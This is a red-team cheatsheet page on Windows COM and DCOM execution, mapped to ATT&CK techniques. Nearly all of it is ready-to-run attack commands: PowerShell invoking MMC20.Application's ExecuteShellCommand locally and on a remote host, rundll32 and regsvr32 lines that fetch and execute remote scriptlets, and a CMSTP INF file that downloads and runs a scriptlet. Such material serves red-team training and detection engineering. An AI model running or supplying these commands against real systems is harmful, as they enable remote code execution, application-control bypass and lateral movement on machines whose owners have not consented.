Twitter LinkedIn GitHub

πŸ“œCOM Execution - T1559.001

Templates and methods of quickly executing COM and DCOM

Windows Components Object Model quick execution cheatsheet

Powershell

Using Powershell with dotnet notation to quickly create a COM or DCOM instance using either CLSID or ProgID

Execution via CLSID

$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

Execution via ProgID

$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

DCOM Execution

Distributed COM is an extension of COM, which enables remote execution of COM among other things. Note that DCOM can also be executed Locally by specifying the loopback interface (127.0.0.1)

$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

Rundll32

Execution via CLSID

Rundll32.exe -sta {GUID}

Execution via ProgID

Rundll32.exe -sta Scripting.Dictionary

Execution via shell32.dll

# Using shell32 exported function
Rundll32.exe shell32.dll,SHCreateLocalServerRunDll {GUID}

Scriptlet Execution from Remote Server

# Running Scriptlet via JavaScript -> GetObject()
rundll32.exe javascript:”\..\mshtml,RunHTMLApplication β€œ;document.write();GetObject(β€œscript:http://127.0.0.1:8080/calc.sct").Exec();

Remote Scriptlet via INF file

# with Rundll32
rundll32.exe advpack.dll,LaunchINFSection path\to\test.inf,DefaultInstall_SingleUser,1

Regsvr32

COM Local Scriptlet Execution 

# Running Scriptlet locally // without touching the registry
regsvr32 /s /n /u /i:malware.sct

COM Scriptlet Execution from Remote Server

# COM Scriptlet via Regsvr32 from remote location // without touching the registry
regsvr32 /s /n /u /i:http://server/file.sct C:\Windows\system32\scrobj.dll

CMSTP

Execution via INF file that downloads and executes a scriptlet (sct)

# INF File
# Running Scriptlet via CMSTP.exe INF-SCT file
[version]
Signature=$Chicago$
AdvancedINF=2.5
 
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
 
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://127.0.0.1:8080/test.sct
 
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="MalTrak"
ShortSvcName="MalTrak"
cmstp.exe /su test.inf

Credit to @Amr_Thabet for the INF code

PyCOM

πŸ› οΈ

Verclsid

Execution via CLSID

verclsid.exe /S /C {CLSID}

Xwizard

Execution via CLSID

xwizard.exe RunWizard /taero /u {CLSID}

ATT&CK Techniques in this Page

  • Command and Scripting Interpreter: PowerShell - T1059.001

  • Inter-Process Communication: Component Object Model - T1559.001

  • System Binary Proxy Execution: CMSTP - T1218.003

  • System Binary Proxy Execution: Rundll32 - T1218.011

  • System Binary Proxy Execution: Verclsid - T1218.012

  • System Binary Proxy Execution: Regsvr32 - T1218.010

PreviousCOM Hijacking - T1546.015NextWindows Exploit Mitigations

Last updated